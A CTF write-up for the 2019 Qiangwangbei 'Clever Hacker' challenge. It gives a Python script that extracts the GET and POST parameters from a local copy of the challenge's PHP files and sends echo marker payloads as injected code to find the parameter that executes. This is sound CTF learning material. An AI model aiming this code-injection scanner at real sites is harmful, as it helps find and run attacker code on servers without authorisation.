[强网杯 2019] 高明的黑客 (Clever Hacker) WriteUp
Knowledge points
- Tests the ability to write a Python script
Solution
- After downloading the source you find a huge number of parameters, but most of them are never executed as a webshell (the value is read but does not reach a code-execution sink).
- So write a script that sends a harmless marker payload through every parameter and finds the one that actually gets executed.
```python
import os
import re
import sys
import time

import requests

# Directory holding the unpacked challenge sources, served at http://localhost/src/
filePath = r"D:\phpstudy_pro\www\src"
os.chdir(filePath)
Files = os.listdir(filePath)

session = requests.Session()
session.keep_alive = False


def getContent(file):
    # Read the file once: a second f.read() on the same handle returns an empty string
    with open(file, encoding="utf-8") as f:
        content = f.read()
    gets = re.findall(r"\$_GET\[\'(.*?)\'\]", content)
    posts = re.findall(r"\$_POST\[\'(.*?)\'\]", content)

    # First request: send the echo payload through every parameter at once, so a file
    # with no executable parameter costs only one round trip
    params = {}
    datas = {}
    for i in gets:
        params[i] = 'echo "Hello_World!!!!";'
    for i in posts:
        datas[i] = 'echo "Hello_Shijie!!!!";'

    url = "http://localhost/src/" + file
    request = session.post(url, data=datas, params=params)
    text = request.content.decode('utf-8')
    request.close()

    # Either marker in the response means some parameter of this file reached eval()
    if 'Hello_World!!!!' in text or 'Hello_Shijie!!!!' in text:
        print("Exploitable file: " + file)
        # Narrow it down to the single $_GET parameter that is executed
        for g in gets:
            request = session.post(url + "?{0}=echo%20'Hello_World!!!!';".format(g))
            text = request.content.decode('utf-8')
            request.close()
            if "Hello_World!!!!" in text:
                print("Exploitable $_GET parameter: " + g)
                sys.exit()
        # Then the $_POST parameters (these echo the POST marker, not the GET one)
        for p in posts:
            request = session.post(url, data={p: 'echo "Hello_Shijie!!!!";'})
            text = request.content.decode('utf-8')
            request.close()
            if "Hello_Shijie!!!!" in text:
                print("Exploitable $_POST parameter: " + p)
                sys.exit()


for file in Files:
    getContent(file)
    time.sleep(0.02)
```
- My Python honestly isn't very good, so for a long time I couldn't solve this. I had only just learned the re library, which is the only reason I could write this. But the machine is fast: it finished in under a minute.
- I did see that many experts online run it with a multithreading library. I haven't learned that yet, so that is for later.